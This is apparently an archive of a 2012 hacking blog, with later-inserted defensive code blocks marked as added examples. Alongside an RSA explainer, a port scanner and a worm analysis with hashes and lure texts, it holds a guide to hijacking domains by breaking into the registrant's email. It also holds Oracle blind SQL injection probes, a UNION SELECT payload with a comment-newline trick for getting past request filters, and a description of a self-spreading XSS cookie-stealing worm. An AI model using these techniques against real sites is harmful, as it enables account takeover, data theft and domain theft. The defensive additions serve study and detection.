Sunday, December 30, 2012

RSA encryption algorithm, or what the American feds were afraid of




Today I want to tell you about an excellent encryption algorithm: RSA. The idea for this post came up while writing the encryption code of a botnet. The algorithm is a technology that the U.S. government at the time was very much afraid of: it even banned a program of a few lines written in Perl, and people printed the code of that program on T-shirts in protest.


So a little history:
RSA (an abbreviation of the surnames Rivest, Shamir and Adleman) is a public-key cryptographic algorithm. RSA was the first algorithm of its type suitable for both encryption and digital signatures, and it is used in a large number of cryptographic applications. The article "New Directions in Cryptography", published in November 1976 by Whitfield Diffie and Martin Hellman, overturned the idea of what a cryptographic system is and laid the foundations of public-key cryptography. The Diffie-Hellman-Merkle scheme developed afterwards allows two parties to obtain a shared secret key over an insecure channel. However, it did not solve the problem of authentication: without additional means, a user could not be sure that he had exchanged keys with the user he actually wanted. After reading the article, three scientists from the Massachusetts Institute of Technology (MIT), Ronald Linn Rivest, Adi Shamir and Leonard Adleman, began searching for a mathematical function that would allow the public-key cryptosystem model formulated by Whitfield Diffie and Martin Hellman to be implemented. After working through more than 40 candidates, they found an algorithm based on the contrast between how easy it is to find large prime numbers and how hard it is to factor the product of two large primes; it later received the name RSA, from the first letters of its creators' surnames. The description of RSA was published in August 1977 in the journal Scientific American. The authors of RSA supported the idea of its wide distribution. The National Security Agency (USA), in turn, fearing the use of this algorithm in state structures, unsuccessfully called for several years for the spread of the system to be halted. The situation sometimes reached the point of absurdity: for example, when the programmer Adam Back described the RSA algorithm in five lines of Perl, the U.S.
government banned the distribution of this program outside the country. People dissatisfied with such restrictions printed the text of the program on their T-shirts in protest. In 1977 the creators of RSA encrypted the phrase "The Magic Words are Squeamish Ossifrage" ("The magic words are squeamish vulture") and promised a reward of $100 for decrypting it. Only at the end of 1995 was this RSA cipher, with a 500-character key, broken in practice: over six months more than 600 volunteers donated CPU time on 1600 machines (two of which were fax machines). Coordination took place over the Internet, and it was one of the first distributed computing projects of this kind. The winners donated the reward to the Free Software Foundation. In December 1997 information was published according to which the British mathematician Clifford Cocks, who worked at the UK Government Communications Headquarters (GCHQ), had described a similar cryptosystem in 1973.


A little about encryption. Depending on the structure of the keys used, encryption methods are divided into:
Symmetric encryption: outsiders may know the encryption algorithm, but a small piece of secret information is unknown to them, the key, which is the same for the sender and the receiver of the message.
Examples: DES, 3DES, AES, Blowfish, Twofish. Asymmetric encryption: outsiders may know the encryption algorithm and possibly the public key, but they do not know the private key, which is known only to the recipient. Public-key cryptosystems are now widely used in a variety of network protocols, such as TLS and its predecessor SSL (which underlie HTTPS), as well as SSH, PGP, S/MIME, etc.
The Russian standard also uses asymmetric encryption. Currently, asymmetric cryptography based on the RSA public-key scheme (named for Rivest, Shamir and Adleman, the creators of the algorithm) is used by most products on the security market. It rests on the difficulty of factoring large numbers: determining the private key from the public one is an exceptionally hard task, since it would require finding the divisors of a large integer. Most systems use cryptographically strong 1024-bit and larger numbers.

Let's consider the RSA algorithm from a practical point of view.

First we need to generate a public and a private key:
- Take two large prime numbers p and q.
- Define n by multiplying p by q (n = p * q).
- Choose a random number, which we call d. This number must be coprime to the product (p-1) * (q-1).
- Define a number e for which the following relation holds: (e * d) mod ((p-1) * (q-1)) = 1.
- Call the pair e and n the public key, and d and n the secret key.

__________________________________________________________________________________

To encrypt data with the public key {e, n}, you need to:
- Divide the plaintext into blocks, each of which can be represented as a number M(i) in the range 0, 1, 2, ..., n-1 (i.e. only up to n-1).
- Encrypt the text, now a sequence of numbers M(i), by the formula C(i) = (M(i) ^ e) mod n.
To decrypt the data with the private key {d, n}, perform the following calculation: M(i) = (C(i) ^ d) mod n. As a result you get the set of numbers M(i), which are the original text.
_________________________________________________________________________________

The following example illustrates the RSA encryption algorithm: we encrypt and decrypt the message "CAB". For simplicity we take small numbers, which shortens the calculations.
- Choose p = 3 and q = 11.
- Define n = 3 * 11 = 33.
- Find (p-1) * (q-1) = 20. Therefore d may be, say, 3 (d = 3).
- Choose a number e such that (e * 3) mod 20 = 1. So e may be, for example, 7 (e = 7).
- Represent the message to be encrypted as a sequence of numbers in the range 0 to 32 (remember, the range ends at n-1). Let A = 1, B = 2, C = 3.
Now encrypt the message with the public key {7, 33}:
C1 = (3 ^ 7) mod 33 = 2187 mod 33 = 9;
C2 = (1 ^ 7) mod 33 = 1 mod 33 = 1;
C3 = (2 ^ 7) mod 33 = 128 mod 33 = 29.
Now decrypt the data with the private key {3, 33}:
M1 = (9 ^ 3) mod 33 = 729 mod 33 = 3 (C);
M2 = (1 ^ 3) mod 33 = 1 mod 33 = 1 (A);
M3 = (29 ^ 3) mod 33 = 24389 mod 33 = 2 (B).
The data is decrypted! That is how the RSA algorithm works. The article, though not large, is useful and carries valuable information for both novice and experienced programmers.
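The key generation, encryption and decryption steps above, carried out in code. This is an added example and not code from the original post; it uses the post's toy parameters (p = 3, q = 11, d = 3, so e = 7 and n = 33) and the post's letter encoding A = 1, B = 2, C = 3. The function names are my own. The block also enforces the one constraint the post states in prose, that every block must be smaller than n.

```python
# Added example (not from the original post): textbook RSA with the post's
# toy parameters. Python 3 standard library only; pow(d, -1, phi) needs 3.8+.
from math import gcd


def make_keypair(p, q, d):
    """Follow the post's recipe: n = p*q, d coprime to (p-1)(q-1), then solve
    e*d = 1 (mod (p-1)(q-1)) for e. Returns ((e, n), (d, n))."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(d, phi) != 1:
        raise ValueError("d must be coprime to (p-1)*(q-1)")
    e = pow(d, -1, phi)  # modular inverse of d mod phi
    return (e, n), (d, n)


def encrypt_blocks(blocks, public_key):
    """C(i) = M(i)^e mod n; every block must lie in 0..n-1."""
    e, n = public_key
    for m in blocks:
        if not 0 <= m < n:
            raise ValueError(f"block {m} is not in 0..{n - 1}")
    return [pow(m, e, n) for m in blocks]


def decrypt_blocks(cipher, private_key):
    """M(i) = C(i)^d mod n."""
    d, n = private_key
    return [pow(c, d, n) for c in cipher]


def encode(text):
    """The post's encoding: A=1, B=2, C=3, ... (upper-case letters only)."""
    return [ord(ch) - ord("A") + 1 for ch in text]


def decode(blocks):
    return "".join(chr(b - 1 + ord("A")) for b in blocks)


def rsa_roundtrip(text, p=3, q=11, d=3):
    """Generate the keys, encrypt `text`, decrypt it again and return
    (public_key, private_key, ciphertext_blocks, recovered_text)."""
    public, private = make_keypair(p, q, d)
    cipher = encrypt_blocks(encode(text), public)
    plain = decode(decrypt_blocks(cipher, private))
    return public, private, cipher, plain


if __name__ == "__main__":
    pub, priv, cipher, plain = rsa_roundtrip("CAB")
    print("public key", pub, "private key", priv)   # (7, 33) (3, 33)
    print("ciphertext", cipher, "->", plain)        # [9, 1, 29] -> CAB
```

Two caveats a practitioner would want next to this: the post's scheme encrypts one letter per block with no padding, so identical letters always produce identical ciphertext numbers (the same 1 for every A), and with n = 33 an attacker can simply tabulate all 33 possible blocks. Real deployments use keys of the size the post mentions and pad each block (OAEP for encryption, PSS for signatures) before the exponentiation.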


Thanks,

 

Monday, December 10, 2012

Hijacking DOMAIN


Domain hijacking is a form of attack a little outside the mainstream, because it is more focused on social engineering: it is an attack directed at a specific victim, in this case the original owner of the domain, the person who owns the email address with which the registration was made. Since that email address is involved in the registration forms, it is much easier to break into the mailbox than into the website itself: tools for brute force, phishing and email cracking abound, or one simply sends an email and waits for the victim to open it, with a little social engineering (the author puts this at 65% for each mail sent to a victim). For that we must understand that in domain hijacking only two things matter: the DNS and the hosting.
This means everyone must know that both the hosting and the DNS have their own panel, but the one we focus on specifically is the panel that handles the DNS routing services.

Now back to the attack itself. To reach the access panel for domain hijacking, the first thing we need is the DNS information:
> The name of the domain that will make the kidnapping.
> The email address to which the record was made of the domain.

This useful information is very easy to get: run a WHOIS lookup on the victim's domain, press Enter, and the search for information about the domain being attacked begins. Once it finishes loading, the WHOIS RECORD is where the e-mail address, the company that provided the registration, etc. appear.

Once you have that information, and taking into account the administrative mail address, the DNS service is intervened: at the domain provider's site you click the reset option and it automatically sends a link to reset the password and enter the DNS PANEL. Clearly this is done after the intervention of that email account, and in it you would see only a redirect page, if not all the domains registered to that email account. # END # 1

Thursday, November 29, 2012

A Simple Port Scanner [Python]



#!/usr/bin/env python3
# Python 3 version of the original script: print() calls, a per-connection
# timeout so filtered ports do not hang the scan, and sockets that are closed.
import os
import socket
import sys

os.system('clear')


def about():
    print("###################################################")
    print("# Simple Port Scanner")
    print("# Coded By nu11_()_v0!d")
    print("# Powered By Team OpenFire")
    print("# Blog: infosec-regeneration.blogspot.com")
    print("#")


def usage():
    print("[?] usage : ./portScan.py 1 65500 IP --- All PORTS")
    print("[?] usage : ./portScan.py 21      IP --- Single PORT")


def is_open(host, port, timeout=1.0):
    # A completed TCP handshake means the port accepts connections.
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except (OSError, socket.timeout):
        return False


def main():
    if len(sys.argv) == 1:
        about()
        usage()

    if len(sys.argv) == 3:
        # one port
        about()
        port = int(sys.argv[1])
        if is_open(sys.argv[2], port):
            print("[!] PORT : ", port, " OPEN")

    if len(sys.argv) == 4:
        # range (the upper bound is exclusive, as in the original)
        about()
        for port in range(int(sys.argv[1]), int(sys.argv[2])):
            if is_open(sys.argv[3], port):
                print("[!] PORT : ", port, " OPEN")


main()
print("http://infosec-regeneration.blogspot.com")
print("###################################################")
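A full TCP connect scan like the one above leaves an obvious trace on the target: one source completing connections to many distinct ports in a short time. The following is an added example, not part of the original post, showing how a defender spots that pattern in connection logs. The log format (one "SRC=... DST=... DPT=..." line per accepted connection) is an assumption; the sample lines are constructed and the function names are my own.

```python
# Added example (not from the original post): flag sources that touch many
# distinct ports on one host inside a sliding time window.
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample: 10.0.0.7 walks ports 20..34 in 15 seconds (a scan);
# 10.0.0.8 makes ordinary web connections. The key=value format is assumed.
SAMPLE_LOG = "\n".join(
    [f"2012-11-29 10:00:{i:02d} SRC=10.0.0.7 DST=10.0.0.20 DPT={20 + i}" for i in range(15)]
    + [
        "2012-11-29 10:00:05 SRC=10.0.0.8 DST=10.0.0.20 DPT=80",
        "2012-11-29 10:00:06 SRC=10.0.0.8 DST=10.0.0.20 DPT=80",
        "2012-11-29 10:00:07 SRC=10.0.0.8 DST=10.0.0.20 DPT=443",
        "this line is noise and is skipped by the parser",
    ]
)

LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) SRC=(?P<src>\S+) DST=(?P<dst>\S+) DPT=(?P<dpt>\d+)$"
)


def parse_events(lines):
    """Return (timestamp, src, dst, port) tuples in time order; unparseable lines are skipped."""
    events = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        events.append((ts, m["src"], m["dst"], int(m["dpt"])))
    return sorted(events)


def find_scanners(lines, min_ports=10, window_s=60):
    """Return {(src, dst): max_distinct_ports} for every source that hit at least
    `min_ports` distinct destination ports on one host within any `window_s` seconds."""
    per_pair = defaultdict(list)
    for ts, src, dst, dpt in parse_events(lines):
        per_pair[(src, dst)].append((ts, dpt))

    hits = {}
    for pair, evs in per_pair.items():
        window = deque()              # events inside the current window
        live = defaultdict(int)       # port -> how many window events use it
        for ts, dpt in evs:
            window.append((ts, dpt))
            live[dpt] += 1
            # drop events older than the window
            while (ts - window[0][0]).total_seconds() > window_s:
                old_ts, old_port = window.popleft()
                live[old_port] -= 1
                if live[old_port] == 0:
                    del live[old_port]
            if len(live) >= min_ports:
                hits[pair] = max(hits.get(pair, 0), len(live))
    return hits


if __name__ == "__main__":
    for (src, dst), n in find_scanners(SAMPLE_LOG.splitlines()).items():
        print(f"{src} touched {n} distinct ports on {dst}")
```

The thresholds are the tuning knobs: a scan of a single port (the script's second usage) will never trip a distinct-port rule, so that case is better caught by a source hitting the same port on many hosts, which is the same sliding-window logic keyed on (src, port) instead of (src, dst).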

Sunday, November 18, 2012

Skype and Messenger Used to Spread a new type of Worm


[found on underground forums]

Since Saturday, there's a worm actively spreading through (mainly) Skype as well as Messenger (Windows Messenger, Microsoft MSN Messenger).

Someone who's infected with this worm will send you the following message:

[IMG]
Message in German asking to check your cool pictures

The link refers to goo.gl, which is Google's URL shortener service. You'll land on Hotfile.com, which is a legitimate file-sharing website. (It's not the first time Hotfile has been used to spread malware, read more here. The file has already been removed by Hotfile.)
Some note regarding it :
Code:
 You should never trust an email which has:

- only a URL included in the message
- crappy spelling and grammar if there is content in the message
- been sent out to everyone in the sender's address book
- been sent from an unknown sender
- promises you can buy something for a very cheap price
- no subject or a strange subject (e.g. "0 enjoy yourself")

Never reply to this kind of email, simply delete it and don't look back ;) .

 If you have downloaded a program and you are unsure about its intentions, you can always upload it to VirusTotal or other online virus scanners (VirScan, Jotti). Keep in mind that if a file is not detected by any engine, it is not necessarily clean!

Now the actual Post continues....
[IMG]
Links refers to Hotfile and will immediately download a ZIP file.

The positive thing is that it is a ZIP file and not an EXE. This means the user still has to manually unpack and run the malware. Inside our ZIP file we'll find the following file, which is disguised as a Skype setup file:
[IMG]

When executing this file, another file (a random 4 character EXE) will be dropped to the %appdata% folder of the currently logged on user:
[IMG]

This file will try to connect to api.wipmania.com, waiting for instructions. Additionally, it tries to connect to the following IP addresses:


Now, how do we know how it spreads and which messages it can display? The file extracted from the ZIP archive, skype_05102012_image.exe, looks for the following processes:
msnmsgr.exe
msmsgs.exe
skype.exe

It will then automatically send a message, based on the OS language. It uses the following list to spread:
1.tas ir jusu jauna profila bildes?
2.seo do grianghraf prl nua?
3.ont uusi profiilikuva?
4.nai aft a fotografa profl sas?
5.sa kvo profili lusankary aquesta
6.s la teva nova foto de perfil?
7.hey ito sa iyong larawan sa profile?
8.hey lanh tieu cua ban?
9.hey ini foto profil?
10.hei zhni de gn zilio zhopin ma?
11.ni phaph porfil khxng khun?
12.hej er det din nye profil billede?
13.hej je to vasa nova slika profila?
14.hej je to tvuj nov obr zek profilu?
15.hei er dette din nye profil bilde?
16.hey la tua immagine del profilo nuovo?
17.hej to jest twj nowy obraz profil?
18.hej jeli ovo vasa nova profil skila?
19.hey bu yeni profil pic?
20.hej detta är din nya profilbild?
21.tung, cka paske lyp ti nket fotografi?
22.moin , kaum zu glauben was für schöne fotos von dir auf deinem profil
23.hey is dit je nieuwe profielfoto?
24.ez az j profil ksta tu foto de perfil nuevo?
25.hey essa sua foto de perfil? rsrsrsrsrsrsrs
26.hey c'est votre nouvelle photo de profil?
27.hoi schoni fotis hesch du uf dim profil ppe n
28.lol is this your new profile pic?


It will then add the link, appending your username after the equals '=' sign:
http://goo.gl/QYV5H?img=


Let's take a closer look at the files:

skype_05102012_image.exe
Result: 23/44
MD5: 98f74b530d4ebf6850c4bc193c558a98
Anubis Report
Malwr Report
ThreatExpert Report


36A9.exe
Result: 16/44
MD5: 0d4b7f4c1731c91dff56afce0ecf37c5
Anubis Report
Malwr Report
ThreatExpert Report


The malware is commonly identified as Worm.Dorkbot and Worm.Agent or Generic Trojan.

Microsoft provides a description:
Win32/Dorkbot is a family of IRC-based worms that spreads via removable drives, instant messaging programs, and social networks. Variants of Win32/Dorkbot may capture user names and passwords by monitoring network communication, and may block websites that are related to security updates. It may also launch a limited denial of service (DoS) attack.

On my test machines there was no additional malware downloaded, even after replicating a few times. Several variants of malware can however always be downloaded, whether it's ransomware, rogueware....



Conclusion

Worms spreading through Facebook, Twitter as well as IRC, MSN and Skype are nothing new. Still, it appears to be very successful, as human curiosity wins in cases of doubt:
"Do I really have (embarrassing) pictures of myself on this website? Better take a look!"

No, no, no!

Never click on unknown links, especially when a URL shortener service like goo.gl is used. (others are for example t.co, bit.ly, tinyurl, etc.)
Don't be fooled by known icons or "legit" file descriptions; these can easily be altered.

Even if you clicked the link and you're not suspicious, you should be when a file is downloaded and no pictures are shown, but just an EXE file.

For checking what is really behind a short URL, you can use:
http://getlinkinfo.com/
http://longurl.org/

For checking whether a file is malicious or not:
https://www.virustotal.com/
http://virusscan.jotti.org/
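The indicators the post gives (a shortener link with the victim's username after '=', the profile-picture lure text, the two sample hashes) are enough for a simple triage check. This is an added example and not part of the original post: the chat-message format, the sample bytes and the function names are constructed, and only the lure link, the shortener domains, a few of the lure phrases and the two MD5 values come from the post. The hash lookup is exact-match only; a repacked variant will not hit it.

```python
# Added example (not from the original post): triage of IM messages and
# downloaded files against the indicators the post lists.
import hashlib
import re
from urllib.parse import urlparse

SHORTENER_DOMAINS = {"goo.gl", "t.co", "bit.ly", "tinyurl.com"}   # named in the post
LURE_LINK = "http://goo.gl/QYV5H?img="                           # username is appended after '='
LURE_PHRASES = ("profile pic", "profilbild", "profielfoto", "photo de profil",
                "foto de perfil", "immagine del profilo", "fotos von dir")
KNOWN_BAD_MD5 = {                                                 # hashes from the post
    "98f74b530d4ebf6850c4bc193c558a98": "skype_05102012_image.exe",
    "0d4b7f4c1731c91dff56afce0ecf37c5": "36A9.exe",
}
URL_RE = re.compile(r"https?://\S+")


def classify_message(text):
    """Return the reasons an IM message looks like the worm's lure (empty list = nothing found)."""
    reasons = []
    urls = URL_RE.findall(text)
    for url in urls:
        host = urlparse(url).netloc.lower()
        if host in SHORTENER_DOMAINS:
            reasons.append(f"shortened URL ({host})")
        if url.startswith(LURE_LINK):
            reasons.append("known lure link with username appended")
    lowered = text.lower()
    if any(phrase in lowered for phrase in LURE_PHRASES):
        reasons.append("profile-picture lure phrase")
    if urls and not URL_RE.sub("", text).strip():
        reasons.append("message is only a URL")
    return reasons


def md5_hex(data):
    """MD5 of a file's bytes, in the form the post's analysis reports list it."""
    return hashlib.md5(data).hexdigest()


def lookup_sample(data):
    """Name of the known sample if the bytes match one of the post's hashes, else None."""
    return KNOWN_BAD_MD5.get(md5_hex(data))


if __name__ == "__main__":
    for msg in ("lol is this your new profile pic? http://goo.gl/QYV5H?img=alice",
                "http://goo.gl/abc",
                "see you at 5 in meeting room B"):
        print(repr(msg), "->", classify_message(msg))
    # Constructed bytes, not a real sample, so no match is expected.
    print(lookup_sample(b"MZ constructed-sample-not-malware"))
```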

Advance Oracle Blind SQL Injection



I had a job to test an application a few days back. It's an application using a Java applet.
Hmm... when I heard it's an application via a Java applet, what came to my mind was:

1 - Internet Explorer will be the better browser
*which is true in this case, since to use another browser I need to install Java JInitiator (something like that)
*no extra add-ons such as HackBar/Tamper Data available in IE

2 - Try to hook it using proxy tools: Burp/Paros/WebScarab/ZAP etc.
*Success, but no use, since the data is encrypted well. Failed to crack/reverse it :(
*Tried to use JavaSnoop. Failed to set it up. hahaha

3 - Manual testing!!!
* The best choice.

The developers of this application are really confident in their application. They already guaranteed that there's no bug in it. That's why the company that hired them asked me to test the application...

So, after testing it for the first day... it is true that the application is hard to hack, not because of the application itself, but because of the Java applet.
How about the application then? LOTS of vulnerabilities.
I found multiple forms vulnerable to Oracle blind SQL injection.

Then came another problem.
Most of the forms only accept a small number of characters. Some of them accept 30 chars, some 40 chars; the longest acceptable length is 90 chars, which I found in one of the vulnerable forms.

It is a BLIND SQLi with a character limit.

At first I had already informed the company about this, but then one of the developers said...
"So what?..You cannot extract anything just by that 1 or 1=1 1=2 thing right?haha"

That really pissed me off. So I needed to extract something from this blind SQLi to show the impact to this developer guy.

A little reading and googling showed that, for blind SQLi in Oracle, we need a lot of characters to successfully extract the data.
The only hope I have now is the one form that accepts 90 chars.

So how am I confident it is a blind SQLi?
Simple.
When I search for " john ", john's profile appears.
But if I search for " john' ", a different profile or a blank profile appears.

So I tried
john' or 1='1 TRUE
john' or 1='2 FALSE

Yep! It is a blind SQLi.

Had a read of the pentestmonkey cheat sheet and found out that we can use this as well, called string concatenation:


jo'||'hn = TRUE
jo'||hn = FALSE
jo'||h||'n = TRUE


So here's the idea.

jo'|| INJECTION HERE if TRUE 'h' else 'x' || 'n

- Let's say we query for the first letter of current_user = 'U'. If current_user's first letter is U, the result will be 'h', which completes the string to jo'||h||'n.
- If the first letter is not U, the result is the else branch 'x', so the string becomes jo'||x||'n, which is not a valid profile in the application.

I added a little example to this tutorial: [IMG]
In order to make sure my instinct was correct, I proceeded with another test.
search=Zack' and 1='1
TRUE!
FALSE!

In Oracle, this query can be used for injection as well.
Let's say we search for:

This will be a false statement, since it'll be something like Za'ck.
If we search for
it'll be a TRUE query, and valid info about Zack will appear.
The query below likewise results in a TRUE statement.
So what we are going to do is, our injection will be like this:
where in the above injection, if the injection returns a valid value (TRUE), it'll be
whereas if FALSE, it'll be
which is not a valid user available (Zaxk).

A simple example of such a query is below.
What is the query above about? It will try to query the database banner from v$version (which has the string Oracle in it).
After that, it'll test the first character (selected by the substr() call) and compare it to the letter 'A'.
If the first letter is 'A', the query will be a valid statement and will return 'c'; if not, it'll return 'X'.
Hope you get the idea :)...
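The reason the jo'||'hn probe returns john's profile while jo'||hn returns a blank one is that the search term is spliced into the SQL text and the database evaluates it. The following is an added example, not the application's or the post's code, that reproduces this against an in-memory SQLite table standing in for the Oracle backend (SQLite also has the '||' concatenation operator the post relies on) and shows the fix: the same query with a bind variable, where the term can only ever be a string value. The table, rows and function names are constructed.

```python
# Added example (not from the original post): the concatenation oracle against a
# string-spliced query, beside the same query written with a bind variable.
import sqlite3


def make_db():
    """Constructed profile table standing in for the application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE profiles (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO profiles VALUES (?, ?)",
                     [("john", "john@example.test"), ("zack", "zack@example.test")])
    return conn


def search_vulnerable(conn, term):
    """The pattern the post found: the term is spliced into the SQL text, so a
    quote and '||' inside it become SQL. A syntax error is swallowed and shown
    as an empty result, which is the 'blank profile' the post saw for john'."""
    sql = f"SELECT name, email FROM profiles WHERE name = '{term}'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return []


def search_hardened(conn, term):
    """Same query with a bind variable: jo'||'hn is looked up literally and
    matches nothing, so there is no TRUE/FALSE difference to observe."""
    return conn.execute(
        "SELECT name, email FROM profiles WHERE name = ?", (term,)
    ).fetchall()


PROBES = ["john", "john'", "jo'||'hn", "jo'||hn"]   # the post's own inputs


def compare_probes(probes=PROBES):
    """{probe: (vulnerable_returns_profile, hardened_returns_profile)}"""
    conn = make_db()
    return {p: (bool(search_vulnerable(conn, p)), bool(search_hardened(conn, p)))
            for p in probes}


if __name__ == "__main__":
    for probe, (vuln, hard) in compare_probes().items():
        print(f"{probe!r:12} vulnerable={vuln!s:5} hardened={hard}")
```

The substr()-based yes/no questions later in the post work for exactly the same reason, and bind variables stop them in the same way; the 90-character input limit the developer relied on is not a control at all, since it only changes how many probes are needed. The same holds for Oracle as for SQLite here: the point is where the term enters the query, not which database runs it.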

Friday, November 16, 2012

Bypassing 404 Bad Request Error




# 400 bad request #
If we get a 400 Bad Request error like this

    site.com/somthing.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, ?29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 +--+/


it means: Your browser sent a request that this server could not understand.
And to bypass this error,

first we need to know where this error begins. Do it like this:

    site.com/somthing.php?id=1' union

nothing happens, no 400 Bad Request error

    site.com/somthing.php?id=1' union select


nothing happens, no 400 Bad Request error

    site.com/somthing.php?id=1' union select 1 +--+/

nothing happens, no 400 Bad Request error

    site.com/somthing.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 +--+/
nothing happens, no 400 Bad Request error

    site.com/somthing.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 +--+/

Oh, a 400 Bad Request error.
Now we know this error begins after column 19, the last one that appears without error. To bypass it we add --+%0A after the column number, like this:

    19--+%0A,20--+%0A,21--+%0A etc ....

DEMO
http://site.com/somthing.php?id=1'and false UNION select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+%0A,20--+%0A,21--+%0A,22--+%0A,23--

+%0A,24--+%0A,25--+%0A,26--+%0A,27--+%0A,28--+%0A,29--+%0A,30--+%0A,31--+%0A,32--
+%0A,33--+%0A,34--+%0A,35--+%0A,36--+%0A,37--+%0A,38--+%0A,39--+%0A,40--+%0A,41--
+%0A,42--+%0A,43--+%0A,44--+%0A,45--+%0A,46--+%0A,47--+%0A,48--+%0A,49--+
Thank You !!
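From the defender's side, the --+%0A trick is a reminder that a filter matching on the raw request line misses a UNION SELECT whose tokens are hidden behind URL encoding and "--" comments that a %0A newline closes. The following is an added example, not part of the original post: it decodes and normalises each query parameter before looking for the keyword pair. The sample URLs are constructed (the middle one uses the post's comment-newline pattern in miniature) and the function names are my own.

```python
# Added example (not from the original post): normalise a request's query
# parameters before matching, so comment/newline and encoding tricks do not
# hide a UNION SELECT from log review or a simple filter.
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# "-- ...<newline>" and "/* ... */" comments; the post's payload closes each
# "--" comment with %0A so that the following column stays live SQL.
COMMENT_RE = re.compile(r"--[^\n]*\n|/\*.*?\*/", re.S)
UNION_RE = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)

# Constructed samples: clean, the post's --+%0A pattern, and double encoding.
SAMPLE_URLS = [
    "http://site.example/something.php?id=1",
    "http://site.example/something.php?id=1'+union+select+1,2,3--+%0A,4--+%0A,5--+",
    "http://site.example/something.php?id=1%2527%20union%2520select%25201",
]


def normalize(value):
    """parse_qsl has already decoded once; a second pass catches %2527-style
    double encoding. Comments become a single space and whitespace collapses."""
    value = unquote_plus(value)
    value = COMMENT_RE.sub(" ", value + "\n")   # trailing newline closes an open -- comment
    return re.sub(r"\s+", " ", value).strip()


def suspicious_params(url):
    """Return {param: normalized_value} for parameters containing UNION SELECT."""
    found = {}
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        norm = normalize(raw)
        if UNION_RE.search(norm):
            found[name] = norm
    return found


if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(url, "->", suspicious_params(url))
```

The normalised value is what belongs in the alert, since that is the text the database parser saw; the raw request is kept alongside it as evidence. A server-side fix (parameterised queries, as for any SQL injection) removes the problem entirely; the detection above only tells you someone is probing.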

Constructing an XSS Worm




Website security: A step-by-step explanation of how an attacker creates an XSS worm


If you find the formatting of this article to be off or hard to read on HBH (as I do, sensitive eyes. HBH's repository is great, but you can only do so much to make a text file pretty without allowing it to be a text file in full), please



Before anyone flames me, the code in this article is purposefully flawed. It will not work. A programmer should be able to get it to work in a matter of minutes. I removed some code and modified other parts so that skiddies don't pick it up. This article is meant for understanding, not as a contribution of code.

A while back, I was poking around a web 2.0 site. I noticed something rather interesting: every single preference for users had its own file. This was probably done because the site, which was AJAX based, modified user information via AJAX, and therefore often only one value was being edited at a time. I started poking around these, and I found out early on that all data sanitation was done with JavaScript. I'm assuming this is because the developer was more comfortable with JavaScript, and didn't use PHP for anything except what he had to (editing database fields, etc.). Because filtering was done via JavaScript, I figured it wasn't done on the PHP side (I was correct), so if I could access the file directly, I was in business.

It worked. site.com/users_neighborhood.php was accessible, and when I edited my neighborhood, I was able to insert a cookie stealer. The cookie stealer employed my favorite concept, albeit not always possible: the image. Which brings me to my first segment of code, the cookie stealer itself:



This code simply creates a PNG image and sets the file's output content-type to PNG.

And the Javascript looked like this:


So, easy part done. Next is the propagation technique. I had a PHP program, and it contained a variable with the entire cookie in it. So the obvious thing to do at this point was to use sockets to connect to our target site's users_neighborhood.php page with the hijacked cookie. I did this by opening a socket and passing data to it. Here's the code:



This section of code just sets up all the variables used later.


This section is a function which allows us to create a valid HTTP/1.1 packet with POST data and cookie data in it.

This section creates our network connection to the site.


This section of code writes the HTTP packet to the site.



What we have done is use the XSS hole in the site to steal the cookie. Our cookie stealer script not only logs cookies, but is also used to authenticate us as that user, granting us the ability to edit THEIR content and steal cookies using their page as well.


LEGAL STUFF/DISCLAIMER: THE CODE IN THIS TUTORIAL WAS EDITED TO ENSURE THAT IT DOES NOT WORK PROPERLY. THIS WAS DONE ON PURPOSE TO AVOID THE USE OF THIS CODE FOR ILLEGITIMATE PURPOSES. THE CODE IS FOR POC PURPOSES ONLY, MEANT TO DEMONSTRATE THE EXTENSION OF XSS HOLES. DON'T DO BAD STUFF, CAUSE IT'S NOT ON ME IF YOU DO. THIS WORM WAS CREATED AND TESTED IN A CONTROLLED ENVIRONMENT.

THANK YOU ALL ...!!!

Setting up 3g mobile broadband in linux/backtrack (The Easy Way)



Recently I bought a 3G mobile broadband dongle to access the internet on weekends when we go out to our ranch. It works perfectly under Windows, but I would still rather run it under Linux, and I've tried so many different options, tutorials, etc. Everybody makes it sound 300x harder than it actually is. This doesn't take much computer know-how. BTW, this is all done with one program called Sakis3G, an awesome little tool with lots of great features like an interactive GUI. Now there are some key notes you have to know before we start.

REMOVE THE SIM CARD FROM THE USB DONGLE AND INSERT IT INTO YOUR PHONE JUST TO MAKE SURE IT DOES NOT HAVE A PIN LOCK. IF IT DOES, REMOVE IT; THE PIN SHOULD BE SOMETHING LIKE 0000 OR 1234, BUT MOST OF THEM THESE DAYS COME UNLOCKED.


Let's get started

About Sakis3g

Sakis3G is a tweaked shell script which is supposed to work out-of-the-box for establishing a 3G connection with any combination of modem or operator. It automagically setups your USB or Bluetooth™ modem, and may even detect operator settings. You should try it when anything else fails!
Now let's browse to Sakis3G and scroll down until you see the download section. If you don't know which version to download, just download the first one:
i386 - Fullversion
 
 
Now before we run it, let's go back to Windows and check the 3G dongle settings. First, the most important thing: everything you see and take note of is case sensitive. Now, what do we need?
 
1. The name of your APN, in case Sakis3G does not acquire it automatically.
2. Your user name and password
Now the password might be a bit tricky. As you can see in mine, my user name is Zain and my password is a four-letter or four-digit password. Most if not all companies would have something like 0000, 1111, 1234, or it can be exactly the same as your user name.
***NOTE***
